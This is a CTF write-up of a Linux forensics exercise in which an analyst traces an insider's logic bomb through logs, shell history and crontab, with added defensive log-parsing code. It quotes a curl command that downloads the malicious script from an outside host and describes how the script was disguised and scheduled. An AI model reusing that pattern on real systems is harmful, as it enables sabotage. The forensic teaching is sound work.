Disgruntled CTF Walkthrough

Juan (Gh0$ttt)
Published in System Weakness
5 min read · Dec 30, 2023

This is a great CTF on TryHackMe, available here: https://tryhackme.com/room/disgruntled

Here’s a little backstory first:

“Not sure if you’ve seen the news, but an employee from the IT department of one of our clients (CyberT) got arrested by the police. The guy was running a successful phishing operation as a side gig.

CyberT wants us to check if this person has done anything malicious to any of their assets. Get set up, grab a cup of coffee, and meet me in the conference room.”

This is the kind of thing that commonly happens to businesses when an employee becomes disgruntled after being fired, being denied a promotion, or simply being unhappy in the workplace. Let’s take a look at the machine the disgruntled employee last worked on.

Our first task is:

  1. The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?
  • Start with the sudo execution history in auth.log under /var/log. Every sudo invocation is logged on a single line carrying the invoking user, TTY, working directory (PWD) and the resolved COMMAND, so filtering for “install” is enough here.
cd /var/log
cat auth.log | grep install
(Screenshot: checking auth.log for the package installed using elevated privileges.)
  • That gives the answer to the first question, the full COMMAND field of the matching sudo line:
/usr/bin/apt install dokuwiki
  • The second question is answered by the same line, which records the directory sudo was run from in its PWD field:
    What was the present working directory (PWD) when the previous command was run?
/home/cybert

For the next task we need to find which user was created after the package was installed.

2. Which user was created after the package from the previous task was installed?

  • This one is easy to solve in the same auth.log file. The account was created through sudo, so the adduser call appears in a COMMAND field and grepping for it works; had an account been created with useradd run directly as root, the “new user:” entry that useradd itself writes to auth.log would be the thing to look for instead.
cat auth.log | grep adduser
(Screenshot: looking at auth.log to find the user created by the disgruntled employee.)
  • After running that, we see that the user created by the disgruntled employee is: it-admin.

3. A user was then later given sudo privileges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)

Dec 28 06:27:34

4. A script file was opened using the “vi” text editor. What is the name of this file?

bomb.sh

To get these two answers I read auth.log in full rather than grepping for one keyword. The sudoers change typically shows up as a sudo COMMAND line invoking visudo or an editor on /etc/sudoers, and the answer is the syslog timestamp at the start of that line; a few lines further on, the same log records the script file being opened with “vi”. Screenshot below. This was done with a simple:

cat auth.log
(Screenshot: it-admin getting sudo privileges and the script opened using “vi”.)
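The four auth.log questions above all come down to reading fields out of sudo’s audit lines, so here is an added example (my own code, not part of the original walkthrough or the TryHackMe room) that does that in one pass instead of separate greps: it parses each sudo line into user/TTY/PWD/COMMAND, buckets the events into package installs, account creation, sudoers changes and editor launches, and condenses them into the facts that go on a timeline. The sample log lines are constructed to mirror the walkthrough’s answers; the hostname, the invoking account name “cybert”, the use of visudo for the sudoers change and every timestamp except the sudoers one are assumptions.

```python
"""Triage the sudo audit records in a Debian/Ubuntu auth.log.

sudo logs every invocation on one syslog line carrying the invoking user,
TTY, working directory (PWD) and the resolved COMMAND, so the facts the
walkthrough hunts for with separate greps (package install, account
creation, sudoers change, editor launch) can be pulled out in one pass.
"""
import re

# Syslog prefix (timestamp, host) followed by sudo's standard audit record.
SUDO_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sudo:\s+"
    r"(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<command>.*)$"
)

PACKAGE_MANAGERS = {"/usr/bin/apt", "/usr/bin/apt-get", "/usr/bin/dpkg"}
ACCOUNT_TOOLS = {"/usr/sbin/adduser", "/usr/sbin/useradd"}
EDITORS = {"/usr/bin/vi", "/usr/bin/vim", "/bin/vi", "/usr/bin/nano"}


def parse_sudo_line(line):
    """Return the fields of a sudo audit line as a dict, or None for any other line."""
    m = SUDO_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def triage(lines):
    """Bucket sudo events into the categories an insider-threat review cares about."""
    report = {"installs": [], "accounts": [], "sudoers": [], "editor": []}
    for line in lines:
        ev = parse_sudo_line(line)
        if ev is None:
            continue  # PAM session lines and everything that is not a sudo audit record
        argv = ev["command"].split()
        prog = argv[0] if argv else ""
        if prog in PACKAGE_MANAGERS and "install" in argv[1:]:
            report["installs"].append(ev)
        elif prog in ACCOUNT_TOOLS:
            report["accounts"].append(ev)
        elif prog == "/usr/sbin/visudo" or "/etc/sudoers" in ev["command"]:
            report["sudoers"].append(ev)  # visudo, or an editor opened on the file directly
        elif prog in EDITORS:
            report["editor"].append(ev)
    return report


def summarize(report):
    """Condense the buckets into the facts an analyst writes into the timeline."""
    facts = {"install_command": None, "install_pwd": None}
    if report["installs"]:
        first = report["installs"][0]
        facts["install_command"] = first["command"]
        facts["install_pwd"] = first["pwd"]
    # adduser/useradd usually take the new account name as the last argument;
    # check the full COMMAND by hand when options follow the name.
    facts["users_created"] = [ev["command"].split()[-1] for ev in report["accounts"]]
    facts["sudoers_changed_at"] = [ev["ts"] for ev in report["sudoers"]]
    facts["files_edited"] = [
        (ev["user"], ev["command"].split(None, 1)[1])
        for ev in report["editor"] if len(ev["command"].split()) > 1
    ]
    return facts


# Constructed sample modelled on the walkthrough's answers (not copied from the
# room): the hostname, the invoking account "cybert", the use of visudo and all
# timestamps except the sudoers one are assumptions.
SAMPLE_AUTH_LOG = """\
Dec 28 06:16:47 cybert-host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:16:47 cybert-host sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cybert(uid=1000)
Dec 28 06:25:14 cybert-host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:27:34 cybert-host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:28:02 cybert-host sudo: it-admin : TTY=pts/1 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi bomb.sh
"""

if __name__ == "__main__":
    for key, value in summarize(triage(SAMPLE_AUTH_LOG.splitlines())).items():
        print(f"{key}: {value}")
```

One caveat worth keeping in mind: sudo only writes these audit lines for commands that go through sudo. If the employee had opened a root shell (sudo -i, sudo su, or su), auth.log would show that single invocation and nothing about what was run inside the shell, so an empty triage is not evidence that nothing happened.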

So we found the “bomb” left behind by the employee. Here is the next set of CTF questions to solve.

5. What is the command used that created the file bomb.sh?

Solution: The command was run from the it-admin account, so the best bet is the .bash_history file in that user’s home directory. Keep in mind that bash only writes the history file when the shell exits, and a user can truncate or disable it, so an empty history is not proof that nothing was run.

(Screenshot: looking into .bash_history under it-admin, which shows the command used to create bomb.sh.)

Answer:

curl 10.10.158.38:8080/bomb.sh --output bomb.sh

6. The file was renamed and moved to a different directory. What is the full path of this file now?

Solution: The same directory listing also shows a .viminfo file. Vim keeps its command-line history there, including shell commands run from inside the editor, so it can reveal both the rename and the destination.

(Screenshot: looking into .viminfo to see the vi history and determine the renamed file and where it was moved to.)

Answer:

/bin/os-update.sh

7. When was the file from the previous question last modified? (Format: Month Day HH:MM)

Solution: We now know the new name and location, so we can go there and check the file’s modification timestamp (ls -l shows it to the minute; stat shows the full modify, change and access times).

(Screenshot: checking the new file location for when the file was last modified.)

Answer:

Dec 28 06:29

8. What is the name of the file that will get created when the file from the first question executes?

Solution: To solve this, we open the script and read the code to see what it will create. Nano works as long as you do not save; on a real investigation prefer cat or less so the evidence file is not touched at all.

(Screenshot: reading the script shows the file it creates: goodbye.txt)

Answer:

goodbye.txt

So we finally have the file and the motive of the disgruntled employee. Let’s find out when this malicious file will trigger.

9. At what time will the malicious file trigger? (Format: HH:MM AM/PM)

Solution: A script that runs on its own with nobody logged in is almost certainly scheduled, so we look at the crontab to see when the malicious file will trigger. The minute and hour fields of the entry give the time.

(Screenshot: the crontab entry that schedules the malicious file.)

Answer:

08:00 AM
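Reading one crontab line by eye is easy; on a box with dozens of jobs you want the schedule and the file evidence from question 7 cross-checked together. The following is an added example (my own code, not from the original post or the room): it parses a crontab, converts fixed-time entries into the HH:MM AM/PM form the question asks for, and flags every job whose target program was modified inside the incident window, which is how a freshly planted script such as /bin/os-update.sh stands out among legitimate jobs. The crontab text, the other two jobs, the modification times (including the year 2023) and the incident window are all constructed; on a live host the mtimes would come from os.stat.

```python
"""Resolve crontab entries to wall-clock times and flag jobs whose target
script was modified inside the incident window.

A crontab line is five time fields (minute hour day-of-month month
day-of-week) followed by the command; /etc/crontab and /etc/cron.d files
carry an extra user column before the command.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

# @-shortcuts cron accepts in place of the five fields. @reboot has no
# wall-clock time, so it is kept as a marker in the minute field.
SHORTCUTS = {
    "@yearly": "0 0 1 1 *", "@annually": "0 0 1 1 *", "@monthly": "0 0 1 * *",
    "@weekly": "0 0 * * 0", "@daily": "0 0 * * *", "@midnight": "0 0 * * *",
    "@hourly": "0 * * * *", "@reboot": "@reboot * * * *",
}
ENV_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")  # PATH=..., MAILTO=..., etc.


@dataclass
class CronJob:
    minute: str
    hour: str
    command: str
    user: Optional[str] = None  # only present in system crontabs

    def fixed_time(self):
        """'HH:MM AM/PM' when the job runs at one fixed time of day, else None."""
        if self.minute.isdigit() and self.hour.isdigit():
            h, m = int(self.hour), int(self.minute)
            if h < 24 and m < 60:
                return datetime(2000, 1, 1, h, m).strftime("%I:%M %p")
        return None  # ranges, lists, steps, '*' and @reboot have no single time

    def program(self):
        """First token of the command: the script or binary cron will execute."""
        return self.command.split()[0]


def parse_crontab(text, system=False):
    """Parse crontab text into CronJob objects, skipping comments and variables."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_RE.match(line):
            continue
        if line.startswith("@"):
            tag, _, rest = line.partition(" ")
            if tag not in SHORTCUTS:
                continue  # unknown tag: leave it for manual review
            line = SHORTCUTS[tag] + " " + rest
        parts = line.split(None, 6 if system else 5)
        if len(parts) < (7 if system else 6):
            continue  # malformed entry
        if system:
            jobs.append(CronJob(parts[0], parts[1], parts[6], user=parts[5]))
        else:
            jobs.append(CronJob(parts[0], parts[1], parts[5]))
    return jobs


def flag_recent_scripts(jobs, mtimes, window_start):
    """Return (job, mtime) pairs for jobs whose program was modified at or after window_start.

    mtimes maps a path to its modification datetime; on a live host build it with
    datetime.fromtimestamp(os.stat(path).st_mtime) for each job's program."""
    flagged = []
    for job in jobs:
        mtime = mtimes.get(job.program())
        if mtime is not None and mtime >= window_start:
            flagged.append((job, mtime))
    return flagged


# Constructed sample data in the shape of the walkthrough's findings (not copied
# from the room); the year, the incident window and the other two jobs are assumptions.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
0 8 * * * /bin/os-update.sh
*/15 * * * * /usr/local/bin/backup.sh
@reboot /usr/bin/touch /run/booted
"""
SAMPLE_MTIMES = {
    "/bin/os-update.sh": datetime(2023, 12, 28, 6, 29),
    "/usr/local/bin/backup.sh": datetime(2023, 6, 1, 12, 0),
    "/usr/bin/touch": datetime(2023, 3, 1, 0, 0),
}
INCIDENT_START = datetime(2023, 12, 28, 6, 0)  # first suspicious sudo activity in auth.log

if __name__ == "__main__":
    jobs = parse_crontab(SAMPLE_CRONTAB)
    for job in jobs:
        print(f"{job.fixed_time() or 'no fixed time':>13}  {job.command}")
    for job, mtime in flag_recent_scripts(jobs, SAMPLE_MTIMES, INCIDENT_START):
        print(f"FLAG: {job.program()} modified {mtime:%b %d %H:%M}, runs at {job.fixed_time()}")
```

Do not stop at the one user’s crontab: the same parser with system=True covers /etc/crontab and the files under /etc/cron.d, and the cron.hourly/daily/weekly directories run whatever scripts they contain without any crontab line at all.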

We did it! What did we find out?

We learned that the disgruntled employee downloaded a script that had been prepared in advance, renamed it to look like a system update script, and scheduled it with cron; it deletes all files of the installed service if the user has not logged in to this machine in the last 30 days. A textbook “logic bomb”.

There is a lot to learn in this CTF about investigating a machine, and Linux fundamentals go a long way here. Instead of reading endlessly through logs such as auth.log, use grep to narrow the output: “cat auth.log | grep install” and “cat auth.log | grep adduser” cut straight to the answers we needed.

Thanks for reading/following along!

Gh0$ttt
